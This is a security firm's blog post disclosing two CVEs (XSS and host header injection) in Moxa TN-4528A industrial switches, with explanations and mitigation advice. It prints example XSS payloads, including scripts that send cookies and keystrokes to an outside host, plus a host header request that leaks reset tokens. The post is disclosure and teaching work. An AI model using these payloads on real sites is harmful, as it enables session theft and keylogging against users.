Blog HackRTU

‹ Regresar

CVE-2025-1679 and CVE-2025-1680: Two new CVE in Moxa devices

 

CHRONICLES OF THE GALAXY

 

 

Several weeks had passed since the last appearance of Juakin PLC Walker and DAV-25. But their disappearance was no coincidence: they had been working in the shadows, altruistically, to detect new vulnerabilities in industrial devices that help manufacturers improve their products and make the galaxy safer.

In one of their latest research campaigns on planet CES12S, Juakin had analyzed some communication switches in a critical infrastructure, the model being TN-4528A from the manufacturer MOXA.

The TN-4528A is an industrial ethernet switch from the ToughNet series, designed for demanding environments where reliability and robustness are crucial. In addition, it is especially prepared for industrial applications that require high availability and resistance to adverse conditions (more information on the TN-4528A device).

Specifically, these were the details of the affected device:

• Model: TN-4528A.
• Specific model: TN-4528A-16POE-4GPOE-T.
• Firmware versions affected (v3.13 and earlier):
  • 3.6.94 build 23120715
  • 3.13.4 build 23081308

Thanks to the information reported by Juakin PLC Walker to Moxa’s PSIRT (Moxa Product Security Incident Response Team) and to the great work of its staff, two vulnerabilities have been published, with their CVE IDs being:

• CVE-2025-1679: Cross-Site Scripting
  • CVSS v4.0: 4.8
  • CVSS AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
  • CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
  • CAPEC-63: Cross-Site Scripting (XSS).
  • EPSS (Waiting for value to be calculated).
• CVE-2025-1680: An acceptance of extraneous untrusted data with trusted data vulnerability
  • CVSS v4.0: 0.0
  • CVSS AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N
  • CWE-349: Acceptance of Extraneous Untrusted Data With Trusted Data.
  • CAPEC-154: Resoulrce Location Spoofing.
  • EPSS (Waiting for value to be calculated).

Similarly, OWASP has a list of defensive measures against XSS.

 

CVE-2025-1679 – CROSS-SITE SCRIPTING

This vulnerability refers to an XSS (Cross-Site Scripting) detected in one of the fields of the web server of the TN-4528A device.

For those who don’t know what an XSS is: this type of vulnerability refers to a security issue in which malicious code (usually JavaScript) is injected into pages that other users will view. In short, the attacker can cause a website to execute arbitrary code in the victim’s browser.

A basic example of code that can be injected into a field of the web server could be:

Un ejemplo básico de código que se puede inyectar en un campo del servidor web puede ser, por ejemplo:

<p>Nombre del dispositivo: <script>alert('WE ARE HACKRTU');</script></p>

This would simply cause that when the legitimate user accesses the web server’s visualization, a pop-up would automatically appear in the middle of the browser showing: WE ARE HACKRTU.

This vulnerability is very common and one of the most exploited in applications, servers, and devices. There are three types of XSS:

• Reflected XSS: The attacker sends the request and it is shown in the victim’s browser, but it is not persistent.
• Stored XSS: The attacker’s payload remains stored in the application and every user who accesses it will execute the code. This type usually occurs in forums, comments, event logs of a device, etc.
• DOM-based XSS: The payload is processed directly in the browser by manipulating the DOM (Document Object Model) with JavaScript.

There are many payloads to exploit an XSS vulnerability, but most important is the impact it can have. An XSS can lead to:

THEFT OF COOKIES OR SESSION TOKENS

Allows an attacker to obtain the stored cookies of the legitimate user to later impersonate their identity.

<script>fetch("https://www.hackrtu.com/steal?c=" + document.cookie);</script>

KEYLOGGING

The attacker inserts a script that records the victim’s keystrokes, for example, on an access panel.

<script>document.addEventListener('keypress', function(e) {  fetch("https://www.hackrtu.com/keys?key=" + encodeURIComponent(e.key));});</script>

THEFT OF SENSITIVE DATA

Obtaining sensitive information from a legitimate user, such as passwords, addresses, etc.

DEFACEMENT

This exploitation through XSS allows an attacker to visually alter the content of a web page to show messages, images, or any other feature in a modified way. Basically, it is an alteration of the user interface by manipulating the victim’s browser DOM.

<script>document.body.innerHTML = "<h1 style='color:red;text-align:center;'>HackRTU was here!</h1>";</script>

From HackRTU, we recommend certain key actions to reduce the risk that assets and products are affected by an XSS. Additionally, Moxa has determined specific recommendations to remediate CVE-2025-1679 on its website.

Our general advice is always to follow the manufacturers’ guidelines, but if you’ve reached this blog and don’t know how to eliminate or mitigate the risk of XSS in your product or asset, here’s a short list of recommendations:

• Validate input parameters: Implement whitelists of allowed characters/parameters in web servers, applications, etc.
• Encode the output: Treat all input as data and not as code, applying secure encoding libraries to escape special characters.
• Content Security Policy (CSP): Implement a restrictive CSP to block inline scripts and allow JavaScript code only from trusted sources (Content-Security-Policy: default-src 'self'; script-src 'self')
• Mark cookies as sensitive using flags as HttpOnly or Secure.

 

CVE-2025-1680 – AN ACCEPTANCE OF EXTRANEOUS UNTRUSTED DATA WITH TRUSTED DATA VULNERABILITY

For the vulnerability CVE-2025-1680 affecting the TN-4528A device, the classification corresponds to an acceptance of extraneous untrusted data with trusted data vulnerability, but, previously it was classified as a host header injection. After a thorough analysis by the Moxa team, the classification was determined to be ‘An acceptance of extraneous untrusted data with trusted data vulnerability’ in coordination with our technicians. Below is a definition of this type of vulnerability.

As it is said in the MOXA advisory: "An acceptance of extraneous untrusted data with trusted data vulnerability has been identified in Moxa’s Ethernet switches, which allows attackers with administrative privileges to manipulate HTTP Host headers by injecting a specially crafted Host header into HTTP requests sent to an affected device’s web service."

With this, from HackRTU, we want to to give back an explanation of what is a “Host Header Injection” and how to prevent it.

The CVE-2025-1680 vulnerability was analyzed by Moxa in order to analyze the real impact of the vulnerability, they studied the attack flow and rated it with a CVSS 4.0 score of zero since the exploitation impact is very insignificant.

Our researchers fully agree with this result, which further reinforces the work of PSIRTs in the industrial cybersecurity world.

A Host Header Injection vulnerability occurs when the application does not validate the Host header in the incoming request.

Every time a website is visited, the browser always sends a Host header to indicate which domain to access. This type of vulnerability creates a trust issue since, by not controlling the header and trusting its value without verification, an attacker can modify it to generate links, redirections, or targeted attacks to trick the victim.

Let us consider a simple example in which a user wishes to recover their password to access the Moxa TN-4528A device, and the application generates the password recovery link including the received Host header (this is a hypothetical scenario, as this example has no direct relation to the CVE-2025-1680 vulnerability, nor is it intended to).

INITIAL REQUEST

GET / HTTP/1.1

Host: hackrtu.com

GENERATED LINK

http://hackrtu.com/reset?token=12398021

 

When the user receives this link by email and clicks it, the reset token goes to hackrtu.com (attacker’s domain) instead of the legitimate one.

In short, such an attack would allow an attacker to obtain reset tokens, redirect users to fake websites, or affect the web server cache or load balancer.

There are some basic recommendations that can be applied to reduce or even eliminate risk, such as:

• Avoid generating URLs from the received Host; instead, use a fixed configuration value.
• Include whitelists of valid domains.
• Normalize and filter forwarded headers and only trust X-Forwarded-Host / Forwarded if coming from trusted proxies.
• Force any host that is not your main host to redirect to your canonical domain.
• Implement headers such as HSTS (Strict-Transport-Security) to always enforce HTTPS and avoid insecure redirection.

All recommendations provided by our technical team are generic. To remediate the specific problems of both CVE-2025-1679 and CVE-2025-1680, HackRTU recommends accessing Moxa’s advisory regarding both vulnerabilities. (MOXA advisory).

 

 

HACKRTU TEAM